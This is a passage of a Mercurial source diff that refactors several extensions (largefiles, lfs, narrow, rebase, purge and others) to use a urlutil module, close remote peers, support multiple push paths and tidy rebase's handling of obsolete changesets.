rendering + commitwin.erase() + helpwin.erase() + mainwin.erase() + if curmode == MODE_PATCH: + renderpatch(mainwin, state) + elif curmode == MODE_HELP: + renderstring(mainwin, state, __doc__.strip().splitlines()) else: - if e == E_RESIZE: - size = screen_size() - if size != stdscr.getmaxyx(): - curses.resizeterm(*size) - - curmode, _ = state[b'mode'] - sizes = layout(curmode) - if curmode != oldmode: - state[b'page_height'] = sizes[b'main'][0] - # Adjust the view to fit the current screen size. - movecursor(state, state[b'pos'], state[b'pos']) - - # Pack the windows against the top, each pane spread across the - # full width of the screen. - y, x = (0, 0) - helpwin, y, x = drawvertwin(sizes[b'help'], y, x) - mainwin, y, x = drawvertwin(sizes[b'main'], y, x) - commitwin, y, x = drawvertwin(sizes[b'commit'], y, x) - - if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP): - if e == E_PAGEDOWN: - changeview(state, +1, b'page') - elif e == E_PAGEUP: - changeview(state, -1, b'page') - elif e == E_LINEDOWN: - changeview(state, +1, b'line') - elif e == E_LINEUP: - changeview(state, -1, b'line') - - # start rendering - commitwin.erase() - helpwin.erase() - mainwin.erase() - if curmode == MODE_PATCH: - renderpatch(mainwin, state) - elif curmode == MODE_HELP: - renderstring(mainwin, state, __doc__.strip().splitlines()) - else: - renderrules(mainwin, state) - rendercommit(commitwin, state) - renderhelp(helpwin, state) - curses.doupdate() - # done rendering - ch = encoding.strtolocal(stdscr.getkey()) - except curses.error: - pass + renderrules(mainwin, state) + rendercommit(commitwin, state) + renderhelp(helpwin, state) + curses.doupdate() + # done rendering + ch = encoding.strtolocal(stdscr.getkey()) def _chistedit(ui, repo, freeargs, opts): diff --git a/hgext/infinitepush/__init__.py b/hgext/infinitepush/__init__.py --- a/hgext/infinitepush/__init__.py +++ b/hgext/infinitepush/__init__.py @@ -116,6 +116,7 @@ from mercurial.utils import ( procutil, stringutil, + urlutil, ) from mercurial import ( @@ -683,7 +684,13 @@ def _pull(orig, ui, repo, source=b"default", **opts): opts = pycompat.byteskwargs(opts) # Copy paste from `pull` command - source, branches = hg.parseurl(ui.expandpath(source), opts.get(b'branch')) + source, branches = urlutil.get_unique_pull_path( + b"infinite-push's pull", + repo, + ui, + source, + default_branches=opts.get(b'branch'), + ) scratchbookmarks = {} unfi = repo.unfiltered() @@ -704,16 +711,19 @@ if scratchbookmarks: other = hg.peer(repo, opts, source) - fetchedbookmarks = other.listkeyspatterns( - b'bookmarks', patterns=scratchbookmarks - ) - for bookmark in scratchbookmarks: - if bookmark not in fetchedbookmarks: - raise error.Abort( - b'remote bookmark %s not found!' % bookmark - ) - scratchbookmarks[bookmark] = fetchedbookmarks[bookmark] - revs.append(fetchedbookmarks[bookmark]) + try: + fetchedbookmarks = other.listkeyspatterns( + b'bookmarks', patterns=scratchbookmarks + ) + for bookmark in scratchbookmarks: + if bookmark not in fetchedbookmarks: + raise error.Abort( + b'remote bookmark %s not found!' % bookmark + ) + scratchbookmarks[bookmark] = fetchedbookmarks[bookmark] + revs.append(fetchedbookmarks[bookmark]) + finally: + other.close() opts[b'bookmark'] = bookmarks opts[b'rev'] = revs @@ -805,7 +815,7 @@ return common, True, remoteheads -def _push(orig, ui, repo, dest=None, *args, **opts): +def _push(orig, ui, repo, *dests, **opts): opts = pycompat.byteskwargs(opts) bookmark = opts.get(b'bookmark') # we only support pushing one infinitepush bookmark at once @@ -833,25 +843,28 @@ oldphasemove = extensions.wrapfunction( exchange, b'_localphasemove', _phasemove ) - # Copy-paste from `push` command - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.Abort( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) + + paths = list(urlutil.get_push_paths(repo, ui, dests)) + if len(paths) > 1: + msg = _(b'cannot push to multiple path with infinitepush') + raise error.Abort(msg) + + path = paths[0] destpath = path.pushloc or path.loc # Remote scratch bookmarks will be deleted because remotenames doesn't # know about them. Let's save it before push and restore after remotescratchbookmarks = _readscratchremotebookmarks(ui, repo, destpath) - result = orig(ui, repo, dest, *args, **pycompat.strkwargs(opts)) + result = orig(ui, repo, *dests, **pycompat.strkwargs(opts)) if common.isremotebooksenabled(ui): if bookmark and scratchpush: other = hg.peer(repo, opts, destpath) - fetchedbookmarks = other.listkeyspatterns( - b'bookmarks', patterns=[bookmark] - ) - remotescratchbookmarks.update(fetchedbookmarks) + try: + fetchedbookmarks = other.listkeyspatterns( + b'bookmarks', patterns=[bookmark] + ) + remotescratchbookmarks.update(fetchedbookmarks) + finally: + other.close() _saveremotebookmarks(repo, remotescratchbookmarks, destpath) if oldphasemove: exchange._localphasemove = oldphasemove diff --git a/hgext/largefiles/basestore.py b/hgext/largefiles/basestore.py --- a/hgext/largefiles/basestore.py +++ b/hgext/largefiles/basestore.py @@ -12,6 +12,9 @@ from mercurial.i18n import _ from mercurial import node, util +from mercurial.utils import ( + urlutil, +) from . import lfutil @@ -29,13 +32,13 @@ def longmessage(self): return _(b"error getting id %s from url %s for file %s: %s\n") % ( self.hash, - util.hidepassword(self.url), + urlutil.hidepassword(self.url), self.filename, self.detail, ) def __str__(self): - return b"%s: %s" % (util.hidepassword(self.url), self.detail) + return b"%s: %s" % (urlutil.hidepassword(self.url), self.detail) class basestore(object): @@ -79,7 +82,7 @@ if not available.get(hash): ui.warn( _(b'%s: largefile %s not available from %s\n') - % (filename, hash, util.hidepassword(self.url)) + % (filename, hash, urlutil.hidepassword(self.url)) ) missing.append(filename) continue diff --git a/hgext/largefiles/lfutil.py b/hgext/largefiles/lfutil.py --- a/hgext/largefiles/lfutil.py +++ b/hgext/largefiles/lfutil.py @@ -206,6 +206,7 @@ repo.root, repo.dirstate._validate, lambda: sparse.matcher(repo), + repo.nodeconstants, ) # If the largefiles dirstate does not exist, populate and create @@ -513,7 +514,7 @@ def islfilesrepo(repo): '''Return true if the repo is a largefile repo.''' if b'largefiles' in repo.requirements and any( - shortnameslash in f[0] for f in repo.store.datafiles() + shortnameslash in f[1] for f in repo.store.datafiles() ): return True diff --git a/hgext/largefiles/overrides.py b/hgext/largefiles/overrides.py --- a/hgext/largefiles/overrides.py +++ b/hgext/largefiles/overrides.py @@ -1567,7 +1567,7 @@ # Calling purge with --all will cause the largefiles to be deleted. # Override repo.status to prevent this from happening. -@eh.wrapcommand(b'purge', extension=b'purge') +@eh.wrapcommand(b'purge') def overridepurge(orig, ui, repo, *dirs, **opts): # XXX Monkey patching a repoview will not work. The assigned attribute will # be set on the unfiltered repo, but we will only lookup attributes in the diff --git a/hgext/largefiles/remotestore.py b/hgext/largefiles/remotestore.py --- a/hgext/largefiles/remotestore.py +++ b/hgext/largefiles/remotestore.py @@ -15,7 +15,10 @@ util, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) from . import ( basestore, @@ -40,11 +43,11 @@ if self.sendfile(source, hash): raise error.Abort( _(b'remotestore: could not put %s to remote store %s') - % (source, util.hidepassword(self.url)) + % (source, urlutil.hidepassword(self.url)) ) self.ui.debug( _(b'remotestore: put %s to remote store %s\n') - % (source, util.hidepassword(self.url)) + % (source, urlutil.hidepassword(self.url)) ) def exists(self, hashes): @@ -80,7 +83,7 @@ # keep trying with the other files... they will probably # all fail too. raise error.Abort( - b'%s: %s' % (util.hidepassword(self.url), e.reason) + b'%s: %s' % (urlutil.hidepassword(self.url), e.reason) ) except IOError as e: raise basestore.StoreError( diff --git a/hgext/largefiles/reposetup.py b/hgext/largefiles/reposetup.py --- a/hgext/largefiles/reposetup.py +++ b/hgext/largefiles/reposetup.py @@ -445,7 +445,7 @@ def checkrequireslfiles(ui, repo, **kwargs): if b'largefiles' not in repo.requirements and any( - lfutil.shortname + b'/' in f[0] for f in repo.store.datafiles() + lfutil.shortname + b'/' in f[1] for f in repo.store.datafiles() ): repo.requirements.add(b'largefiles') scmutil.writereporequirements(repo) diff --git a/hgext/largefiles/storefactory.py b/hgext/largefiles/storefactory.py --- a/hgext/largefiles/storefactory.py +++ b/hgext/largefiles/storefactory.py @@ -12,6 +12,9 @@ hg, util, ) +from mercurial.utils import ( + urlutil, +) from . import ( lfutil, @@ -19,6 +22,7 @@ wirestore, ) + # During clone this function is passed the src's ui object # but it needs the dest's ui object so it can read out of # the config file. Use repo.ui instead. @@ -28,24 +32,27 @@ if not remote: lfpullsource = getattr(repo, 'lfpullsource', None) - if lfpullsource: - path = ui.expandpath(lfpullsource) - elif put: - path = ui.expandpath(b'default-push', b'default') + if put: + path = urlutil.get_unique_push_path( + b'lfpullsource', repo, ui, lfpullsource + ) else: - path = ui.expandpath(b'default') + path, _branches = urlutil.get_unique_pull_path( + b'lfpullsource', repo, ui, lfpullsource + ) - # ui.expandpath() leaves 'default-push' and 'default' alone if - # they cannot be expanded: fallback to the empty string, - # meaning the current directory. + # XXX we should not explicitly pass b'default', as this will result in + # b'default' being returned if no `paths.default` was defined. We + # should explicitely handle the lack of value instead. if repo is None: - path = ui.expandpath(b'default') - path, _branches = hg.parseurl(path) + path, _branches = urlutil.get_unique_pull_path( + b'lfs', repo, ui, b'default' + ) remote = hg.peer(repo or ui, {}, path) elif path == b'default-push' or path == b'default': remote = repo else: - path, _branches = hg.parseurl(path) + path, _branches = urlutil.parseurl(path) remote = hg.peer(repo or ui, {}, path) # The path could be a scheme so use Mercurial's normal functionality @@ -71,7 +78,7 @@ raise error.Abort( _(b'%s does not appear to be a largefile store') - % util.hidepassword(path) + % urlutil.hidepassword(path) ) diff --git a/hgext/lfs/blobstore.py b/hgext/lfs/blobstore.py --- a/hgext/lfs/blobstore.py +++ b/hgext/lfs/blobstore.py @@ -31,7 +31,10 @@ worker, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) from ..largefiles import lfutil @@ -725,7 +728,7 @@ https://github.com/git-lfs/git-lfs/blob/master/docs/api/server-discovery.md """ lfsurl = repo.ui.config(b'lfs', b'url') - url = util.url(lfsurl or b'') + url = urlutil.url(lfsurl or b'') if lfsurl is None: if remote: path = remote @@ -739,7 +742,7 @@ # and fall back to inferring from 'paths.remote' if unspecified. path = repo.ui.config(b'paths', b'default') or b'' - defaulturl = util.url(path) + defaulturl = urlutil.url(path) # TODO: support local paths as well. # TODO: consider the ssh -> https transformation that git applies @@ -748,7 +751,7 @@ defaulturl.path += b'/' defaulturl.path = (defaulturl.path or b'') + b'.git/info/lfs' - url = util.url(bytes(defaulturl)) + url = urlutil.url(bytes(defaulturl)) repo.ui.note(_(b'lfs: assuming remote store: %s\n') % url) scheme = url.scheme diff --git a/hgext/lfs/wrapper.py b/hgext/lfs/wrapper.py --- a/hgext/lfs/wrapper.py +++ b/hgext/lfs/wrapper.py @@ -116,10 +116,10 @@ if hgmeta or text.startswith(b'\1\n'): text = storageutil.packmeta(hgmeta, text) - return (text, True, {}) + return (text, True) -def writetostore(self, text, sidedata): +def writetostore(self, text): # hg filelog metadata (includes rename, etc) hgmeta, offset = storageutil.parsemeta(text) if offset and offset > 0: diff --git a/hgext/mq.py b/hgext/mq.py --- a/hgext/mq.py +++ b/hgext/mq.py @@ -108,6 +108,7 @@ from mercurial.utils import ( dateutil, stringutil, + urlutil, ) release = lockmod.release @@ -2509,7 +2510,7 @@ ) filename = normname(filename) self.checkreservedname(filename) - if util.url(filename).islocal(): + if urlutil.url(filename).islocal(): originpath = self.join(filename) if not os.path.isfile(originpath): raise error.Abort( @@ -2862,11 +2863,12 @@ # main repo (destination and sources) if dest is None: dest = hg.defaultdest(source) - sr = hg.peer(ui, opts, ui.expandpath(source)) + __, source_path, __ = urlutil.get_clone_path(ui, source) + sr = hg.peer(ui, opts, source_path) # patches repo (source only) if opts.get(b'patches'): - patchespath = ui.expandpath(opts.get(b'patches')) + __, patchespath, __ = urlutil.get_clone_path(ui, opts.get(b'patches')) else: patchespath = patchdir(sr) try: diff --git a/hgext/narrow/narrowcommands.py b/hgext/narrow/narrowcommands.py --- a/hgext/narrow/narrowcommands.py +++ b/hgext/narrow/narrowcommands.py @@ -36,6 +36,9 @@ util, wireprototypes, ) +from mercurial.utils import ( + urlutil, +) table = {} command = registrar.command(table) @@ -214,6 +217,7 @@ newincludes, newexcludes, force, + backup, ): oldmatch = narrowspec.match(repo.root, oldincludes, oldexcludes) newmatch = narrowspec.match(repo.root, newincludes, newexcludes) @@ -272,10 +276,10 @@ hg.clean(repo, urev) overrides = {(b'devel', b'strip-obsmarkers'): False} with ui.configoverride(overrides, b'narrow'): - repair.strip(ui, unfi, tostrip, topic=b'narrow') + repair.strip(ui, unfi, tostrip, topic=b'narrow', backup=backup) todelete = [] - for f, f2, size in repo.store.datafiles(): + for t, f, f2, size in repo.store.datafiles(): if f.startswith(b'data/'): file = f[5:-2] if not newmatch(file): @@ -442,6 +446,12 @@ ), ( b'', + b'backup', + True, + _(b'back up local changes when narrowing'), + ), + ( + b'', b'update-working-copy', False, _(b'update working copy when the store has changed'), @@ -583,81 +593,88 @@ # Find the revisions we have in common with the remote. These will # be used for finding local-only changes for narrowing. They will # also define the set of revisions to update for widening. - remotepath = ui.expandpath(remotepath or b'default') - url, branches = hg.parseurl(remotepath) - ui.status(_(b'comparing with %s\n') % util.hidepassword(url)) + r = urlutil.get_unique_pull_path(b'tracked', repo, ui, remotepath) + url, branches = r + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) remote = hg.peer(repo, opts, url) - # check narrow support before doing anything if widening needs to be - # performed. In future we should also abort if client is ellipses and - # server does not support ellipses - if widening and wireprototypes.NARROWCAP not in remote.capabilities(): - raise error.Abort(_(b"server does not support narrow clones")) + try: + # check narrow support before doing anything if widening needs to be + # performed. In future we should also abort if client is ellipses and + # server does not support ellipses + if ( + widening + and wireprototypes.NARROWCAP not in remote.capabilities() + ): + raise error.Abort(_(b"server does not support narrow clones")) - commoninc = discovery.findcommonincoming(repo, remote) + commoninc = discovery.findcommonincoming(repo, remote) - if autoremoveincludes: - outgoing = discovery.findcommonoutgoing( - repo, remote, commoninc=commoninc - ) - ui.status(_(b'looking for unused includes to remove\n')) - localfiles = set() - for n in itertools.chain(outgoing.missing, outgoing.excluded): - localfiles.update(repo[n].files()) - suggestedremovals = [] - for include in sorted(oldincludes): - match = narrowspec.match(repo.root, [include], oldexcludes) - if not any(match(f) for f in localfiles): - suggestedremovals.append(include) - if suggestedremovals: - for s in suggestedremovals: - ui.status(b'%s\n' % s) - if ( - ui.promptchoice( - _( - b'remove these unused includes (yn)?' - b'$$ &Yes $$ &No' + if autoremoveincludes: + outgoing = discovery.findcommonoutgoing( + repo, remote, commoninc=commoninc + ) + ui.status(_(b'looking for unused includes to remove\n')) + localfiles = set() + for n in itertools.chain(outgoing.missing, outgoing.excluded): + localfiles.update(repo[n].files()) + suggestedremovals = [] + for include in sorted(oldincludes): + match = narrowspec.match(repo.root, [include], oldexcludes) + if not any(match(f) for f in localfiles): + suggestedremovals.append(include) + if suggestedremovals: + for s in suggestedremovals: + ui.status(b'%s\n' % s) + if ( + ui.promptchoice( + _( + b'remove these unused includes (yn)?' + b'$$ &Yes $$ &No' + ) ) - ) - == 0 - ): - removedincludes.update(suggestedremovals) - narrowing = True - else: - ui.status(_(b'found no unused includes\n')) + == 0 + ): + removedincludes.update(suggestedremovals) + narrowing = True + else: + ui.status(_(b'found no unused includes\n')) - if narrowing: - newincludes = oldincludes - removedincludes - newexcludes = oldexcludes | addedexcludes - _narrow( - ui, - repo, - remote, - commoninc, - oldincludes, - oldexcludes, - newincludes, - newexcludes, - opts[b'force_delete_local_changes'], - ) - # _narrow() updated the narrowspec and _widen() below needs to - # use the updated values as its base (otherwise removed includes - # and addedexcludes will be lost in the resulting narrowspec) - oldincludes = newincludes - oldexcludes = newexcludes + if narrowing: + newincludes = oldincludes - removedincludes + newexcludes = oldexcludes | addedexcludes + _narrow( + ui, + repo, + remote, + commoninc, + oldincludes, + oldexcludes, + newincludes, + newexcludes, + opts[b'force_delete_local_changes'], + opts[b'backup'], + ) + # _narrow() updated the narrowspec and _widen() below needs to + # use the updated values as its base (otherwise removed includes + # and addedexcludes will be lost in the resulting narrowspec) + oldincludes = newincludes + oldexcludes = newexcludes - if widening: - newincludes = oldincludes | addedincludes - newexcludes = oldexcludes - removedexcludes - _widen( - ui, - repo, - remote, - commoninc, - oldincludes, - oldexcludes, - newincludes, - newexcludes, - ) + if widening: + newincludes = oldincludes | addedincludes + newexcludes = oldexcludes - removedexcludes + _widen( + ui, + repo, + remote, + commoninc, + oldincludes, + oldexcludes, + newincludes, + newexcludes, + ) + finally: + remote.close() return 0 diff --git a/hgext/patchbomb.py b/hgext/patchbomb.py --- a/hgext/patchbomb.py +++ b/hgext/patchbomb.py @@ -1,6 +1,6 @@ # patchbomb.py - sending Mercurial changesets as patch emails # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -99,7 +99,10 @@ templater, util, ) -from mercurial.utils import dateutil +from mercurial.utils import ( + dateutil, + urlutil, +) stringio = util.stringio @@ -379,7 +382,10 @@ if btype: opts['type'] = btype try: - commands.bundle(ui, repo, tmpfn, dest, **opts) + dests = [] + if dest: + dests = [dest] + commands.bundle(ui, repo, tmpfn, *dests, **opts) return util.readfile(tmpfn) finally: try: @@ -527,9 +533,9 @@ def _getoutgoing(repo, dest, revs): '''Return the revisions present locally but not in dest''' ui = repo.ui - url = ui.expandpath(dest or b'default-push', dest or b'default') - url = hg.parseurl(url)[0] - ui.status(_(b'comparing with %s\n') % util.hidepassword(url)) + paths = urlutil.get_push_paths(repo, ui, [dest]) + safe_paths = [urlutil.hidepassword(p.rawloc) for p in paths] + ui.status(_(b'comparing with %s\n') % b','.join(safe_paths)) revs = [r for r in revs if r >= 0] if not revs: diff --git a/hgext/phabricator.py b/hgext/phabricator.py --- a/hgext/phabricator.py +++ b/hgext/phabricator.py @@ -103,6 +103,7 @@ from mercurial.utils import ( procutil, stringutil, + urlutil, ) from . import show @@ -366,7 +367,7 @@ process(k, v) process(b'', params) - return util.urlreq.urlencode(flatparams) + return urlutil.urlreq.urlencode(flatparams) def readurltoken(ui): @@ -381,7 +382,7 @@ _(b'config %s.%s is required') % (b'phabricator', b'url') ) - res = httpconnectionmod.readauthforuri(ui, url, util.url(url).user) + res = httpconnectionmod.readauthforuri(ui, url, urlutil.url(url).user) token = None if res: diff --git a/hgext/purge.py b/hgext/purge.py --- a/hgext/purge.py +++ b/hgext/purge.py @@ -22,115 +22,11 @@ # You should have received a copy of the GNU General Public License # along with this program; if not, see <http://www.gnu.org/licenses/>. -'''command to delete untracked files from the working directory''' -from __future__ import absolute_import - -from mercurial.i18n import _ -from mercurial import ( - cmdutil, - merge as mergemod, - pycompat, - registrar, - scmutil, -) - -cmdtable = {} -command = registrar.command(cmdtable) -# Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for -# extensions which SHIP WITH MERCURIAL. Non-mainline extensions should -# be specifying the version(s) of Mercurial they are tested with, or -# leave the attribute unspecified. -testedwith = b'ships-with-hg-core' - - -@command( - b'purge|clean', - [ - (b'a', b'abort-on-err', None, _(b'abort if an error occurs')), - (b'', b'all', None, _(b'purge ignored files too')), - (b'i', b'ignored', None, _(b'purge only ignored files')), - (b'', b'dirs', None, _(b'purge empty directories')), - (b'', b'files', None, _(b'purge files')), - (b'p', b'print', None, _(b'print filenames instead of deleting them')), - ( - b'0', - b'print0', - None, - _( - b'end filenames with NUL, for use with xargs' - b' (implies -p/--print)' - ), - ), - ] - + cmdutil.walkopts, - _(b'hg purge [OPTION]... [DIR]...'), - helpcategory=command.CATEGORY_WORKING_DIRECTORY, -) -def purge(ui, repo, *dirs, **opts): - """removes files not tracked by Mercurial - - Delete files not known to Mercurial. This is useful to test local - and uncommitted changes in an otherwise-clean source tree. - - This means that purge will delete the following by default: - - - Unknown files: files marked with "?" by :hg:`status` - - Empty directories: in fact Mercurial ignores directories unless - they contain files under source control management +'''command to delete untracked files from the working directory (DEPRECATED) - But it will leave untouched: - - - Modified and unmodified tracked files - - Ignored files (unless -i or --all is specified) - - New files added to the repository (with :hg:`add`) - - The --files and --dirs options can be used to direct purge to delete - only files, only directories, or both. If neither option is given, - both will be deleted. - - If directories are given on the command line, only files in these - directories are considered. - - Be careful with purge, as you could irreversibly delete some files - you forgot to add to the repository. If you only want to print the - list of files that this program would delete, use the --print - option. - """ - opts = pycompat.byteskwargs(opts) - cmdutil.check_at_most_one_arg(opts, b'all', b'ignored') +The functionality of this extension has been included in core Mercurial since +version 5.7. Please use :hg:`purge ...` instead. :hg:`purge --confirm` is now the default, unless the extension is enabled for backward compatibility. +''' - act = not opts.get(b'print') - eol = b'\n' - if opts.get(b'print0'): - eol = b'\0' - act = False # --print0 implies --print - if opts.get(b'all', False): - ignored = True - unknown = True - else: - ignored = opts.get(b'ignored', False) - unknown = not ignored - - removefiles = opts.get(b'files') - removedirs = opts.get(b'dirs') - - if not removefiles and not removedirs: - removefiles = True - removedirs = True - - match = scmutil.match(repo[None], dirs, opts) - - paths = mergemod.purge( - repo, - match, - unknown=unknown, - ignored=ignored, - removeemptydirs=removedirs, - removefiles=removefiles, - abortonerror=opts.get(b'abort_on_err'), - noop=not act, - ) - - for path in paths: - if not act: - ui.write(b'%s%s' % (path, eol)) +# This empty extension looks pointless, but core mercurial checks if it's loaded +# to implement the slightly different behavior documented above. diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -67,6 +67,14 @@ cmdtable = {} command = registrar.command(cmdtable) + +configtable = {} +configitem = registrar.configitem(configtable) +configitem( + b'devel', + b'rebase.force-in-memory-merge', + default=False, +) # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should # be specifying the version(s) of Mercurial they are tested with, or @@ -136,7 +144,7 @@ return smartset.baseset() dests = destutil.orphanpossibledestination(repo, src) if len(dests) > 1: - raise error.Abort( + raise error.StateError( _(b"ambiguous automatic rebase: %r could end up on any of %r") % (src, dests) ) @@ -197,8 +205,8 @@ self.skipemptysuccessorf = rewriteutil.skip_empty_successor( repo.ui, b'rebase' ) - self.obsoletenotrebased = {} - self.obsoletewithoutsuccessorindestination = set() + self.obsolete_with_successor_in_destination = {} + self.obsolete_with_successor_in_rebase_set = set() self.inmemory = inmemory self.dryrun = dryrun self.stateobj = statemod.cmdstate(repo, b'rebasestate') @@ -340,25 +348,33 @@ return data - def _handleskippingobsolete(self, obsoleterevs, destmap): - """Compute structures necessary for skipping obsolete revisions - - obsoleterevs: iterable of all obsolete revisions in rebaseset - destmap: {srcrev: destrev} destination revisions - """ - self.obsoletenotrebased = {} + def _handleskippingobsolete(self): + """Compute structures necessary for skipping obsolete revisions""" + if self.keepf: + return if not self.ui.configbool(b'experimental', b'rebaseskipobsolete'): return - obsoleteset = set(obsoleterevs) + obsoleteset = {r for r in self.state if self.repo[r].obsolete()} ( - self.obsoletenotrebased, - self.obsoletewithoutsuccessorindestination, - obsoleteextinctsuccessors, - ) = _computeobsoletenotrebased(self.repo, obsoleteset, destmap) - skippedset = set(self.obsoletenotrebased) - skippedset.update(self.obsoletewithoutsuccessorindestination) - skippedset.update(obsoleteextinctsuccessors) + self.obsolete_with_successor_in_destination, + self.obsolete_with_successor_in_rebase_set, + ) = _compute_obsolete_sets(self.repo, obsoleteset, self.destmap) + skippedset = set(self.obsolete_with_successor_in_destination) + skippedset.update(self.obsolete_with_successor_in_rebase_set) _checkobsrebase(self.repo, self.ui, obsoleteset, skippedset) + allowdivergence = self.ui.configbool( + b'experimental', b'evolution.allowdivergence' + ) + if allowdivergence: + self.obsolete_with_successor_in_rebase_set = set() + else: + for rev in self.repo.revs( + b'descendants(%ld) and not %ld', + self.obsolete_with_successor_in_rebase_set, + self.obsolete_with_successor_in_rebase_set, + ): + self.state.pop(rev, None) + self.destmap.pop(rev, None) def _prepareabortorcontinue( self, isabort, backup=True, suppwarns=False, dryrun=False, confirm=False @@ -366,6 +382,8 @@ self.resume = True try: self.restorestatus() + # Calculate self.obsolete_* sets + self._handleskippingobsolete() self.collapsemsg = restorecollapsemsg(self.repo, isabort) except error.RepoLookupError: if isabort: @@ -396,15 +414,6 @@ if not destmap: return _nothingtorebase() - rebaseset = destmap.keys() - if not self.keepf: - try: - rewriteutil.precheck(self.repo, rebaseset, action=b'rebase') - except error.Abort as e: - if e.hint is None: - e.hint = _(b'use --keep to keep original changesets') - raise e - result = buildstate(self.repo, destmap, self.collapsef) if not result: @@ -416,7 +425,7 @@ if self.collapsef: dests = set(self.destmap.values()) if len(dests) != 1: - raise error.Abort( + raise error.InputError( _(b'--collapse does not work with multiple destinations') ) destrev = next(iter(dests)) @@ -430,6 +439,20 @@ if dest.closesbranch() and not self.keepbranchesf: self.ui.status(_(b'reopening closed branch head %s\n') % dest) + # Calculate self.obsolete_* sets + self._handleskippingobsolete() + + if not self.keepf: + rebaseset = set(destmap.keys()) + rebaseset -= set(self.obsolete_with_successor_in_destination) + rebaseset -= self.obsolete_with_successor_in_rebase_set + try: + rewriteutil.precheck(self.repo, rebaseset, action=b'rebase') + except error.Abort as e: + if e.hint is None: + e.hint = _(b'use --keep to keep original changesets') + raise e + self.prepared = True def _assignworkingcopy(self): @@ -461,14 +484,10 @@ for rev in self.state: branches.add(repo[rev].branch()) if len(branches) > 1: - raise error.Abort( + raise error.InputError( _(b'cannot collapse multiple named branches') ) - # Calculate self.obsoletenotrebased - obsrevs = _filterobsoleterevs(self.repo, self.state) - self._handleskippingobsolete(obsrevs, self.destmap) - # Keep track of the active bookmarks in order to reset them later self.activebookmark = self.activebookmark or repo._activebookmark if self.activebookmark: @@ -490,19 +509,10 @@ def progress(ctx): p.increment(item=(b"%d:%s" % (ctx.rev(), ctx))) - allowdivergence = self.ui.configbool( - b'experimental', b'evolution.allowdivergence' - ) for subset in sortsource(self.destmap): sortedrevs = self.repo.revs(b'sort(%ld, -topo)', subset) - if not allowdivergence: - sortedrevs -= self.repo.revs( - b'descendants(%ld) and not %ld', - self.obsoletewithoutsuccessorindestination, - self.obsoletewithoutsuccessorindestination, - ) for rev in sortedrevs: - self._rebasenode(tr, rev, allowdivergence, progress) + self._rebasenode(tr, rev, progress) p.complete() ui.note(_(b'rebase merging completed\n')) @@ -564,16 +574,13 @@ return newnode - def _rebasenode(self, tr, rev, allowdivergence, progressfn): + def _rebasenode(self, tr, rev, progressfn): repo, ui, opts = self.repo, self.ui, self.opts ctx = repo[rev] desc = _ctxdesc(ctx) if self.state[rev] == rev: ui.status(_(b'already rebased %s\n') % desc) - elif ( - not allowdivergence - and rev in self.obsoletewithoutsuccessorindestination - ): + elif rev in self.obsolete_with_successor_in_rebase_set: msg = ( _( b'note: not rebasing %s and its descendants as ' @@ -583,8 +590,8 @@ ) repo.ui.status(msg) self.skipped.add(rev) - elif rev in self.obsoletenotrebased: - succ = self.obsoletenotrebased[rev] + elif rev in self.obsolete_with_successor_in_destination: + succ = self.obsolete_with_successor_in_destination[rev] if succ is None: msg = _(b'note: not rebasing %s, it has no successor\n') % desc else: @@ -610,7 +617,7 @@ self.destmap, self.state, self.skipped, - self.obsoletenotrebased, + self.obsolete_with_successor_in_destination, ) if self.resume and self.wctx.p1().rev() == p1: repo.ui.debug(b'resuming interrupted rebase\n') @@ -722,7 +729,7 @@ self.destmap, self.state, self.skipped, - self.obsoletenotrebased, + self.obsolete_with_successor_in_destination, ) editopt = opts.get(b'edit') editform = b'rebase.collapse' @@ -1085,10 +1092,10 @@ with repo.wlock(), repo.lock(): rbsrt.restorestatus() if rbsrt.collapsef: - raise error.Abort(_(b"cannot stop in --collapse session")) + raise error.StateError(_(b"cannot stop in --collapse session")) allowunstable = obsolete.isenabled(repo, obsolete.allowunstableopt) if not (rbsrt.keepf or allowunstable): - raise error.Abort( + raise error.StateError( _( b"cannot remove original changesets with" b" unrebased descendants" @@ -1112,6 +1119,8 @@ with ui.configoverride(overrides, b'rebase'): return _dorebase(ui, repo, action, opts, inmemory=inmemory) except error.InMemoryMergeConflictsError: + if ui.configbool(b'devel', b'rebase.force-in-memory-merge'): + raise ui.warn( _( b'hit merge conflicts; re-running rebase without in-memory' @@ -1210,14 +1219,16 @@ ) % help ) - raise error.Abort(msg) + raise error.InputError(msg) if rbsrt.collapsemsg and not rbsrt.collapsef: - raise error.Abort(_(b'message can only be specified with collapse')) + raise error.InputError( + _(b'message can only be specified with collapse') + ) if action: if rbsrt.collapsef: - raise error.Abort( + raise error.InputError( _(b'cannot use collapse with continue or abort') ) if action == b'abort' and opts.get(b'tool', False): @@ -1284,7 +1295,7 @@ cmdutil.bailifchanged(repo) if ui.configbool(b'commands', b'rebase.requiredest') and not destf: - raise error.Abort( + raise error.InputError( _(b'you must specify a destination'), hint=_(b'use: hg rebase -d REV'), ) @@ -1378,7 +1389,7 @@ return None if wdirrev in rebaseset: - raise error.Abort(_(b'cannot rebase the working copy')) + raise error.InputError(_(b'cannot rebase the working copy')) rebasingwcp = repo[b'.'].rev() in rebaseset ui.log( b"rebase", @@ -1416,7 +1427,7 @@ elif size == 0: ui.note(_(b'skipping %s - empty destination\n') % repo[r]) else: - raise error.Abort( + raise error.InputError( _(b'rebase destination for %s is not unique') % repo[r] ) @@ -1449,7 +1460,7 @@ return nullrev if len(parents) == 1: return parents.pop() - raise error.Abort( + raise error.StateError( _( b'unable to collapse on top of %d, there is more ' b'than one external parent: %s' @@ -1649,7 +1660,7 @@ b"to force the rebase please set " b"experimental.evolution.allowdivergence=True" ) - raise error.Abort(msg % (b",".join(divhashes),), hint=h) + raise error.StateError(msg % (b",".join(divhashes),), hint=h) def successorrevs(unfi, rev): @@ 